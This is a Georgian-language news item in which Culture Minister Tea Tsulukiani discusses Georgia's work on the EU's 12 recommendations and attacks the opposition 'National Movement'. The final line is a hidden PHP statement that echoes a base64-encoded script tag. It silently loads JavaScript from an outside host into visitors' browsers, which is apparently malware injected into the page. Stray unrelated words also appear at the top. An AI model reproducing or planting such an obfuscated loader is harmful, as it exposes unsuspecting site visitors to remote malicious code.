celsiusi
ავერსი შნაიდერი
დეკემბერში ჩვენ, როგორც ხელისუფლება, ღირსეულად წარვდგებით ევროკავშირის სტრუქტურების წინაშე, როდესაც წარვადგენთ რეფორმებს, განსაზღვრულ დროში განხორციელებულ შედეგებს, რომლებიც ხელშესახები იქნება, – ამის შესახებ საქართველოს კულტურის მინისტრმა, თეა წულუკიანმა განაცხადა.
 
როგორც თეა წულუკიანმა აღნიშნა, 12 რეკომენდაციის შესრულებაზე მუშაობა საქართველოს პარლამენტმა, უფრო კონკრეტულად კი, საპარლამენტო უმრავლესობამ და ოპოზიციის სულ რამდენიმე წარმომადგენელმა ძალიან აქტიურად აწარმოეს.
 
„ვფიქრობ, დეკემბერში ჩვენ, როგორც ხელისუფლება, ღირსეულად წარვდგებით ევროკავშირის სტრუქტურების წინაშე, როდესაც წარვადგენთ რეფორმებს, განსაზღვრულ დროში განხორციელებულ შედეგებს, რომლებიც ხელშესახები იქნება, ვიტყვი, რომ აი ეს არის თუ როგორ ერთგულობდა „ქართული ოცნების“ ხელისუფლება ქართველის ერის ევროპულ არჩევანს. ამის იქით უკვე ევროკავშირის გადასაწყვეტია გამოსწორდება თუ არა ჩემი პირადი აზრით, ის უსამართლობა, რომელიც უკავშირდებოდა მოლდოვასა და უკრაინისთვის ერთი ტიპის სტატუსის მინიჭებას და საქართველოსთვის ცოტა უფრო ერთი რანგით დაბალი სტატუსის მინიჭებას.
 
რაც შეეხება „ნაციონალურ მოძრაობას“ და სხვა დესტრუქციულ ოპოზიციას, მათ არ იღეს ყურად ათასჯერ შეხსენებული რეკომენდაცია ევროკავშირელების მხრიდან, რომ ისინი მმართველ პარტიასთან ერთად დამსხდარიყვნენ და ემუშავათ 12 რეკომენდაციაზე. ეს არ არის ჩვენი პრობლემა, ეს მათი პრობლემა. რეალურად ჩვენ ვხედავთ, რომ დეპოლარიზაციას როდესაც საყვედურობდნენ სახელისუფლებო გუნდს, ამ თეორიამ სახელისუფლებო გუნდზე კრახი განიცადა. ყველამ კარგად დავინახეთ, რომ ქვეყანაში დეპოლარიზაცია იმდენად არის, რამდენადაც დესტრუქცია, საბოტაჟი და ასევე მტრული დამოკიდებულება ნებისმიერი კეთილი წამოწყებისადმი, ამ ყველაფერს სათავეში უდგას სწორედ „ნაციონალური მოძრაობა“, თუ უფრო სწორად რაც მათგან დარჩა და ის დესტრუქციული რამდენიმე ადამიანი, რომელიც ევროკავშირში დადის და ეუბნება, რომ ნუ მიიღებთ ამ ქვეყანას თქვენს რიგებში, რადგან ჩემი სამშობლო ამას არ იმსახურებსო. აი ასეთ ხალხთან უხდება ჩვენ საპარლამენტო უმრავლესობას თანაცხოვრება“, – განაცხადა თეა წულუკიანმა.
 
 
 
 
299
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");